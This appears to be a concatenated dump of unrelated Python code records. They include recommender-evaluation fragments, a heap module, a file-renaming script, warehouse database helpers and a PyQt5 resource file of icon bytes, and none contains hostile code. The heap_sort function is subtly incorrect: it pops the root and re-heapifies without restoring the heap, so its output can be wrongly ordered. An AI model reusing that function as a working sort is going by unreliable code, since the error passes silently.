final = test_simple_instance_test1(test_user, items, item_numbers, disliked_list, user)
print final
print "final"
#recommended_list = list(zip(*recommendations)[0])
#recommended_list = [int(x)-1 for x in recommended_list]
# final_extracted = movies_contents.ix[final,:]
# print "User {}'s ratings on Recommended movis".format(user)
# examine_list = examine_the_results2(final_extracted, rtmp, user)
print 'train_user.shape',train_user.shape
print 'test_user.shape',test_user.shape
print 'train_user.movieId.unique()',train_user.movieId.unique().size
print 'test_user.movieId.unique()',test_user.movieId.unique().size
# final=[]
# for movie in recommended_list:
# if movie in train_user.movieId.unique():
# print "movie ",movie,' is in train_user'
# if movie in test_user.movieId.unique():
# final.append(movie)
# print "movie ",movie,' is in test_user'
print "Final movies"
final_extracted = movies_contents.ix[final,:]
print "User {}'s ratings on Final movies".format(user)
final_examine_list = examine_the_results3(final_extracted, test_user, user)
# later...
#examine_list_iter = iter_exam(items, item_numbers, disliked_list, movies_contents, ratings_as_mat, user=654)
#examine_list_iter = iter_exam(items, item_numbers, disliked_list, movies_contents, rtmp, user=654)
#or row in examine_list_iter for x in row if x > 0])
|
8,115 | 1262d41be3bf873d003464cb23998dde20fde318 | import array
def swap(arr, first, second):
"""
Swaps the first index with the second.
arr: an input array
first: an index in the array
second: an index in the array
This function has the side effect mentioned above.
"""
arr[first], arr[second] = arr[second], arr[first]
def parent(i):
"""
i: an integer index in a heap.
Returns the index of the parent of the given index.
"""
return (i + 1) / 2 - 1
def left(i):
"""
i: an integer index in a heap.
Returns the index of the left-child of the given index.
"""
return 2 * (i + 1) - 1
def right(i):
"""
i: an integer index in a heap
Returns the index of the right-child of the given index.
"""
return 2 * (i + 1)
def max_heapify(heap, i):
"""
Assumes that the binary tree rooted at Left(i) and Right(i) are max-heaps
but that A[i] may be smaller than its children. Max-heapify lets A[i] float
down in order to satisfy the max-heap property.
heap: an array that is being treated as a heap
i: an index in the heap
This method causes side effects in the heap given to it that bring the heap
closer to a max-heap.
"""
left_child = left(i)
right_child = right(i)
if left_child < len(heap) and heap[left_child] > heap[i]:
largest = left_child
else:
largest = i
if right_child < len(heap) and heap[right_child] > heap[largest]:
largest = right_child
if largest != i:
swap(heap, i, largest)
max_heapify(heap, largest)
example_heap = array.array('i', [16, 4, 10, 14, 7, 9, 3, 2, 8, 1])
def build_max_heap(arr):
for i in range(len(arr) / 2, 0, -1):
max_heapify(arr, i-1)
def max_heapify_unrecursive(heap, i):
"""
Assumes that the binary tree rooted at Left(i) and Right(i) are max-heaps
but that A[i] may be smaller than its children. Max-heapify lets A[i] float
down in order to satisfy the max-heap property.
heap: an array that is being treated as a heap
i: an index in the heap
This method causes side effects in the heap given to it that bring the heap
closer to a max-heap.
"""
while True:
left_child = left(i)
right_child = right(i)
largest = i
if left_child < len(heap) and heap[left_child] > heap[i]:
largest = left_child
if right_child < len(heap) and heap[right_child] > heap[largest]:
largest = right_child
if largest == i:
return
swap(heap, i, largest)
i = largest
def heap_sort(arr):
build_max_heap(arr)
sorted_list = []
while arr:
sorted_list.append(arr.pop(0))
max_heapify(arr, 0)
sorted_list.reverse()
return sorted_list
|
8,116 | d483314fa7e8a2514fd5089b872b9e480e7454f4 | ####################################################################################
# About
# Date: April 12, 2018
# Notes
'''
Code that renames a list of files in a directory
MUST Run in Python 3 environment!
jpeg Drop extra number at the end of unique ID
add DEL or INS based on variant type
'''
'''
Resources
---------
https://gist.github.com/seanh/93666
https://www.youtube.com/watch?v=ve2pmm5JqmI
https://www.youtube.com/watch?v=WQVisBzJGLw
'''
####################################################################################
import os
path2 = '/Volumes/lesleydata/manual_Curation_app/images/svviz_JMZook/1000_Rand_Samp_INS_DEL_2/app_images/DEL/PBDEL'
os.chdir('/Volumes/lesleydata/manual_Curation_app/images/svviz_JMZook/1000_Rand_Samp_INS_DEL_2/app_images/DEL/PBDEL')
for f in os.listdir():
file_name, file_ext = os.path.splitext(f)
file_name = file_name.replace('_DEL', '')
# file_name = file_name.replace(' 1', '')
# file_name = file_name.replace(' 2', '')
# file_name = file_name.replace(' 3', '')
# file_name = file_name.replace(' 4', '')
# file_name = file_name.replace(' 5', '')
# file_name = file_name.replace(' 6', '')
# file_name = file_name.replace(' 7', '')
# file_name = file_name.replace(' 8', '')
# file_name = file_name.replace(' 9', '')
# file_name = file_name.replace(' 10', '')
# file_name = file_name.replace(' 11', '')
# file_name = file_name.replace(' 12', '')
os.rename(os.path.join(path2, f), os.path.join(path2, file_name + '.jpeg'))
|
8,117 | 79c4a2d4503c2639950675b398e000aae367ff4a | from app.models.tables import Warehouse, Contractor, Articles
class ContractorTools(Contractor):
"""
Работа со справочником КА
"""
@staticmethod
def add_contractor(**kwargs):
ca = Contractor(**kwargs)
ca.insert()
@staticmethod
def delete_contractor(**kwargs):
ca = Contractor()
ca = ca.select_expression(id_contr=kwargs['id_contr'])[0]
ca.delete_data()
@staticmethod
def update_contractor(**kwargs):
ca = Contractor(**kwargs)
# ca = ca.select_expression(id_contr=kwargs['id_contr'])[0]
ca.update_data()
@staticmethod
def get_contractors():
contr = Contractor()
contrs = contr.select_expression()
contrs = contr.db_obj_to_dict(*contrs)
return dict(contractors=contrs)
class ArticleTools(Articles):
"""
Работа со справочником ТП
"""
@staticmethod
def add_article(**kwargs):
ca = Articles(**kwargs)
ca.insert()
@staticmethod
def update_article(**kwargs):
ca = Articles(**kwargs)
# ca = ca.select_expression(id_contr=kwargs['id_contr'])[0]
ca.update_data()
@staticmethod
def delete_article(**kwargs):
ca = Articles()
ca = ca.select_expression(id_art=kwargs['id_art'])[0]
ca.delete_data()
class WarehouseTools(Warehouse):
"""
Работа со справочником МХ
"""
def set_new_name(self, id_ws, name):
"""
Переименовывает переданный МХ
"""
ws = super().select_expression(id_ws=id_ws)[0]
ws.name.set_value(name)
ws.update_data()
return True
def delete_warehouse(self, id_ws, name):
ws = super().select_expression(id_ws=id_ws)[0]
for child in super().select_expression(id_higher=id_ws):
for child_child in super().select_expression(id_higher=child.id_ws.value):
child_child.delete_data()
child.delete_data()
ws.delete_data()
return True
@staticmethod
def add_warehouse(id_higher, name):
ws = Warehouse(name=name, id_higher=id_higher)
try:
ws_parent = ws.select_expression(id_ws=id_higher)[0]
parent_level = ws_parent.level.value + 1
except IndexError:
parent_level = 1
id_higher = None
ws.level.set_value(parent_level)
ws.id_higher.set_value(id_higher)
ws.insert()
return True
@staticmethod
def move_warehouse(id_ws, id_higher):
if id_higher == '':
id_higher = None
ws = Warehouse()
ws = ws.select_expression(id_ws=id_ws)[0]
ws.id_higher.set_value(id_higher)
ws.update_data()
return True
@staticmethod
def get_warehouses():
warehouse = Warehouse()
warehouses = warehouse.select_expression()
warehouses = warehouse.db_obj_to_dict(*warehouses)
return dict(warehouses=warehouses)
@staticmethod
def get_ws_tree():
warehouse = Warehouse()
return warehouse.get_full_tree()
|
8,118 | dbf831540d11a994d5483dc97c7eab474f91f0d3 | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x01\xde\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x28\x00\x00\x00\x28\x08\x06\x00\x00\x00\x8c\xfe\xb8\x6d\
\x00\x00\x01\xa5\x49\x44\x41\x54\x78\x9c\xed\xd8\x3f\x6b\x14\x41\
\x1c\x87\xf1\x4f\x42\x2c\x8d\x45\x88\x58\x0b\x22\x24\x20\xa4\xb0\
\x49\xa3\x28\x8a\x08\xfe\x69\x24\x4d\xf0\xcc\xeb\x4a\x61\x52\xa8\
\x2f\xc1\xca\x22\x20\x36\x82\x58\x59\x58\x08\x2a\x68\xa2\x44\xc5\
\x34\x81\xa8\x9b\x62\x38\x18\xe6\x76\x6f\x2f\x97\x9d\x35\x1c\xfb\
\xc0\xc0\xdd\xcc\xee\xcd\xb3\xbf\xd9\xfd\xde\xdc\xd1\xd1\x71\x32\
\xb8\x8f\xef\x28\x8e\xd8\xbe\xe2\x56\x1b\x82\xdb\xb8\x3c\xc6\x79\
\x37\xf0\xbe\x61\x97\x52\x8a\x31\xcf\x3b\x83\x5f\x4d\x8a\xa4\x4c\
\xe7\xfc\xf0\x26\x98\x78\xc1\x7d\xfc\x73\xf4\x87\x2b\x6e\xdf\x70\
\xb7\x6e\xa2\x71\xef\xc1\x26\x58\xc6\xa7\xba\x83\xfe\xa7\xe0\xd0\
\xf9\x27\xfe\x1e\xcc\xce\x44\x08\xae\x0a\x61\x7c\x9c\x27\xb5\xae\
\x89\x5e\x1f\x60\x3d\x95\xa8\xba\x49\x67\xf1\x03\x0b\x23\x5c\x48\
\x53\x9c\xc3\xef\xfe\x9b\xba\x0a\xae\xe0\x05\xde\xe5\x34\x4a\xb8\
\x87\xe7\x69\x67\x55\x05\x5f\xe2\x4e\x56\x9d\x41\x5e\xe1\x76\xda\
\x59\x26\x78\x41\xd8\x4e\xcd\xe4\x36\x8a\xb8\x88\x2f\xf1\x9c\xc3\
\x96\xf8\x21\x9e\xe2\x4f\x66\xa9\x98\x1e\x9e\x94\xcd\x99\x56\x70\
\x1a\x1f\x71\xa9\x05\xa9\x78\xce\xcf\x58\x2c\x1b\x4c\x05\xaf\xe1\
\x4d\x6e\xa3\x84\x9b\x78\x9d\x76\x56\x2d\xf1\x1a\x1e\x67\xd5\x19\
\xa4\x87\x8d\xaa\xc1\xb8\x82\xa7\x85\xec\x9b\xcf\x2c\x14\x33\x8b\
\x9f\x98\x4b\x07\xca\x2a\xf8\x00\x5b\xc2\x8f\xa8\xb6\xe8\xe7\xed\
\x6e\xd5\x01\x71\x05\xb7\x84\xb0\x6c\x93\xda\xbc\xed\x0b\x9e\xc7\
\x0e\x4e\xe5\x36\x8a\x18\x9a\xb7\xe9\x12\xf7\xf0\x4c\xf8\xc2\x6e\
\x8b\x91\xf2\xb6\xc0\x14\x3e\x60\xa9\x05\xa9\x3e\x23\xe7\x6d\x81\
\xab\x78\x9b\x59\x28\xe5\xba\x9a\xbc\x8d\x97\xb8\x87\xcd\xac\x3a\
\x83\x3c\x32\x62\xde\x16\x42\xf6\x9d\xcd\x69\x13\x31\x25\xfc\xa7\
\xb3\xa3\x24\xfb\xca\xd8\x93\x77\xc7\x9c\xb6\xbf\xc2\x1e\xf3\xca\
\x31\x2f\xb4\xa3\xa3\xe3\xc4\x73\x08\x28\x98\x98\x24\xc8\xdd\xa5\
\x40\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x03\xab\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x03\x00\x00\x00\x28\x2d\x0f\x53\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x84\
\x50\x4c\x54\x45\x32\x37\x39\x00\x00\x00\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\xff\xff\xff\xeb\x7d\xd9\x30\x00\x00\x00\x2a\
\x74\x52\x4e\x53\x00\x00\x2c\xcf\xb7\x01\x18\x20\x1f\x1c\x15\xbd\
\x78\xc3\xc1\x77\x27\x31\x95\xbe\x2d\xdf\x50\x22\x1e\xca\xdc\x24\
\xc2\x28\x26\x32\x1d\x11\xb9\x4d\xf4\x12\xde\x4f\x88\xe0\xc4\x83\
\x03\xa2\x00\x00\x00\x01\x62\x4b\x47\x44\x2b\x24\xb9\xe4\x08\x00\
\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x04\x02\x0c\x2c\x5e\x9a\
\xf1\x93\x00\x00\x00\x89\x49\x44\x41\x54\x18\xd3\x55\xcf\xd9\x12\
\x82\x30\x10\x44\xd1\x8e\x18\x88\xc8\xb0\xb8\x05\x01\x41\x41\x41\
\xf3\xff\x1f\x68\x36\x04\xef\x5b\x9f\xaa\xa9\x4a\x80\x75\x9b\x60\
\x0b\x1e\x46\xc2\x16\xed\x78\xbc\x57\x01\x12\x4a\x5d\x94\xe5\xc5\
\xe1\x78\xc2\xf9\x22\xa4\xad\x2c\xe8\x5a\xc4\x40\x25\xfc\x7d\xdd\
\x28\xba\x71\x0d\x12\x8c\xe9\xdd\x36\xaa\xe9\xb2\xbb\x03\xb7\xa9\
\x2e\x29\x9a\xc1\xec\x16\x32\x9d\xe1\xd1\x9b\xbd\x82\xe1\xd9\xeb\
\xbd\x82\x7c\x78\xe1\x0f\x6c\x6c\x01\x9f\x07\xb1\xfc\x4d\x18\x18\
\x27\xff\x74\x29\xc5\x44\x21\xf0\x1e\xab\x5f\x9f\x84\xe3\x0b\x50\
\xe9\x0c\xb4\xd8\x75\xd4\x0e\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\
\x30\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x32\x30\x2b\x30\
\x30\x3a\x30\x30\x86\x67\x0e\x5c\x00\x00\x00\x25\x74\x45\x58\x74\
\x64\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x31\x39\
\x2d\x30\x31\x2d\x30\x38\x54\x31\x39\x3a\x34\x39\x3a\x34\x36\x2b\
\x30\x30\x3a\x30\x30\xb0\x72\x32\xb2\x00\x00\x00\x20\x74\x45\x58\
\x74\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\
\x2f\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\
\x67\xbc\xcf\x1d\x9d\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\
\x67\x65\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x19\x74\x45\x58\
\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\
\x65\x69\x67\x68\x74\x00\x31\x30\x36\x38\x8a\xfc\x51\x92\x00\x00\
\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\
\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\x00\x31\x30\x36\x38\x9f\xb5\
\x8d\x8b\x00\x00\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\
\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\
\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x34\x36\
\x39\x37\x36\x39\x38\x36\x42\x37\xbe\xd0\x00\x00\x00\x12\x74\x45\
\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x31\x38\
\x32\x33\x37\x42\x1b\x5d\x79\xed\x00\x00\x00\x5a\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\
\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\
\x77\x77\x77\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\
\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\
\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\x73\x2f\x31\x31\x39\x2f\x31\
\x31\x39\x30\x37\x31\x30\x2e\x70\x6e\x67\x5a\xd1\x76\x4b\x00\x00\
\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\x27\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x03\x00\x00\x00\xd7\xa9\xcd\xca\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x02\x01\
\x50\x4c\x54\x45\x00\x00\x00\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\
\x88\x84\x8f\x8d\x8a\x94\x85\x81\x8c\x85\x82\x8c\x8a\x87\x91\x8c\
\x89\x92\xab\xaa\xb0\x8f\x8c\x96\x8e\x8b\x95\x8e\x8b\x94\x90\x8e\
\x97\x8b\x87\x92\x9a\x98\xa1\x98\x96\x9e\x8e\x8c\x95\x86\x83\x8e\
\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x97\x8b\x88\x92\x8c\
\x89\x93\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\
\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\x8b\x88\x92\x8d\x8a\x93\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x93\x91\
\x9a\x8c\x89\x93\x8b\x88\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8b\
\x88\x92\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\
\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xaa\xa9\xaf\
\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8b\x88\x92\x8f\x8c\
\x96\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8c\
\x89\x93\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\x8b\x88\x92\x8b\x88\
\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\
\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\
\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\
\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8e\x8c\x95\xae\xad\xb3\
\xaa\xa9\xaf\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\x8b\
\x88\x92\x8c\x8a\x93\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\
\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\
\x88\x92\x8f\x8c\x95\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\x8b\x89\x92\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\
\x90\x8d\x96\x8b\x88\x92\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\x92\xae\
\xad\xb3\x00\x00\x00\xb1\xc2\x75\x92\x00\x00\x00\xa6\x74\x52\x4e\
\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x03\x13\x15\x15\x14\x06\x2a\xc2\xcf\xcf\xce\
\x49\x18\x14\x45\xfb\x6f\x07\x14\x23\xbc\xb9\x2b\x6b\xfe\x91\x02\
\x12\xbf\x2a\xbe\xd5\xa9\xe8\xee\xa7\xb8\xc7\x11\xb8\xc6\x1e\x08\
\x94\xc0\x19\xba\xf4\xf4\xdb\x31\xa1\xdf\x79\x3d\x3c\x75\xb5\x03\
\x05\x41\x65\x86\xeb\x3d\x36\xd9\xed\x71\x47\x2b\x04\xca\x6e\xfb\
\xc3\x13\xce\xf4\x34\xf0\xd0\x15\xcf\x3b\x33\xef\xcf\xc5\xfd\x74\
\x69\xfe\x04\x30\x4e\xea\xdb\x35\x2f\xd5\xf2\x96\x4b\xab\xd9\x6d\
\x33\x33\xb1\x05\x25\xf0\xef\xc1\x17\xb1\x9a\x0a\x1a\xc3\xc8\x29\
\xc6\xc4\xad\xef\xb7\xd7\xc1\x9f\x02\x8a\x7c\x04\x2c\xba\xcc\x17\
\x0b\x51\x16\x21\xcc\x15\x04\x0d\xb7\x9c\xe1\x00\x00\x00\x01\x62\
\x4b\x47\x44\x00\x88\x05\x1d\x48\x00\x00\x00\x09\x70\x48\x59\x73\
\x00\x00\x00\x64\x00\x00\x00\x64\x00\x0f\x96\xc5\xdd\x00\x00\x00\
\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\x30\x1e\x4a\x5a\xd3\x78\
\x00\x00\x01\x8a\x49\x44\x41\x54\x28\xcf\x63\x60\x80\x02\x46\x11\
\x51\x31\x71\x09\x49\x26\x06\x24\xc0\x08\x06\x52\xd2\x32\xb2\x72\
\xf2\xcc\x4c\x4c\x4c\x2c\xac\x70\x71\x05\x45\x46\x46\x25\xe5\x65\
\xcb\x57\xa8\x30\x33\xa9\xaa\x31\xb3\xb1\x42\xc5\xd5\x35\x34\xb5\
\x18\xb5\x75\x80\x12\xba\x7a\xfa\xba\x06\x86\xcc\xec\xac\x60\x09\
\x75\xa3\x95\x2b\x8d\x4d\x4c\x57\x02\x25\xcc\xcc\x2d\x56\xac\xb0\
\x34\x64\xe6\x00\x49\x58\x59\xaf\x84\x00\xa0\x04\x04\xd8\xd8\x72\
\x82\x24\xec\xec\xd1\x25\x1c\x1c\x99\xc0\x46\x29\x3a\x41\x24\x9c\
\x5d\x20\xe2\xae\x6e\xcc\xcc\x10\xb7\xba\x83\x84\x3d\x3c\xbd\xbc\
\x7d\x5c\x41\x12\xbe\x7e\xcc\x9c\x4c\x0c\xfe\x01\x81\x41\xc1\x20\
\xf1\x10\x46\x2e\x6e\x8e\xd0\x30\xa0\x44\x78\x44\x64\x54\x34\x83\
\x68\x0c\xc4\x1c\x4f\xa0\x4e\x56\x1e\x8e\x58\xb0\x61\x71\xf1\x09\
\x0c\x8a\x89\x60\xf1\xa4\x10\x46\x46\x06\x06\x56\xa6\xe4\x14\xb0\
\x4c\x6a\x1a\x83\x62\x3a\x44\x22\x03\x24\xc1\xcb\x94\x99\x05\x96\
\xc8\x4e\x63\x10\xcd\xc9\x05\xcb\xe4\x01\x8d\xe2\xe5\x63\xce\x2f\
\x00\x4b\xc8\x49\x30\x14\x16\x15\xe7\x95\x00\x25\x4a\xcb\x80\x96\
\xf3\x97\x57\x00\x45\x2b\xab\x22\xaa\x25\xc1\xce\xad\x01\x69\xa9\
\xad\xab\x6f\xc8\x07\x89\xaf\x68\x6c\x62\x86\x78\xa4\x19\x62\x8d\
\x4e\x4b\x2b\xc4\x9c\xb6\x76\x26\xb0\xcf\xad\x3a\xd0\x83\xa4\xb3\
\x0b\x2c\xd1\xdd\x83\x2e\xd1\x0b\x0d\xab\xbe\xfe\x95\x2b\x27\x4c\
\x9c\x04\x92\xc8\x9a\x3c\x05\xe8\x24\x37\x66\x01\x48\x44\x49\x4d\
\x9d\xd6\x3d\x7d\x06\x48\x62\xe6\xac\xd9\x73\xe6\xba\x31\x0b\x0a\
\x41\xa3\x70\xde\x7c\x46\xc6\x40\xa0\x44\xc1\x02\x66\xe6\x85\x8b\
\x98\x05\x79\x90\x13\x43\xc0\x62\x19\x59\xcb\x4c\x66\x60\x6a\x10\
\xe6\x41\x49\x2a\xfe\x8a\x62\x4b\x12\x96\x32\xc3\xf8\x00\x2f\x5c\
\xba\x88\xe8\x0b\x3a\x2c\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\
\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\x30\
\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x31\x38\x2b\x30\x30\
\x3a\x30\x30\x3b\x07\x47\xd8\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x32\x30\x2d\
\x30\x35\x2d\x30\x32\x54\x30\x31\x3a\x32\x38\x3a\x35\x35\x2b\x30\
\x30\x3a\x30\x30\x48\x1e\x77\xe4\x00\x00\x00\x20\x74\x45\x58\x74\
\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\
\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\
\xbc\xcf\x1d\x9d\x00\x00\x00\x63\x74\x45\x58\x74\x73\x76\x67\x3a\
\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x20\x47\x65\x6e\x65\x72\x61\x74\
\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\x6c\x75\x73\x74\
\x72\x61\x74\x6f\x72\x20\x31\x39\x2e\x30\x2e\x30\x2c\x20\x53\x56\
\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\x67\x2d\x49\x6e\
\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\x6f\x6e\x3a\x20\
\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\x29\x20\x20\xce\
\x48\x90\x0b\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\
\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\
\x67\x68\x74\x00\x35\x38\x37\x2e\x25\x1c\x47\x00\x00\x00\x17\x74\
\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\
\x3a\x57\x69\x64\x74\x68\x00\x35\x38\x37\xbd\xd4\x4c\x1a\x00\x00\
\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\
\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\
\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x38\x38\x33\x38\x32\x39\
\x33\x35\x93\xf3\x7b\x53\x00\x00\x00\x12\x74\x45\x58\x74\x54\x68\
\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x33\x32\x37\x36\x32\x42\
\x50\x47\x06\xdb\x00\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\
\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\
\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\
\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\
\x2f\x66\x69\x6c\x65\x73\x2f\x31\x32\x35\x2f\x31\x32\x35\x37\x33\
\x32\x38\x2e\x70\x6e\x67\xf9\x67\xb6\x19\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\xd2\
\x89\
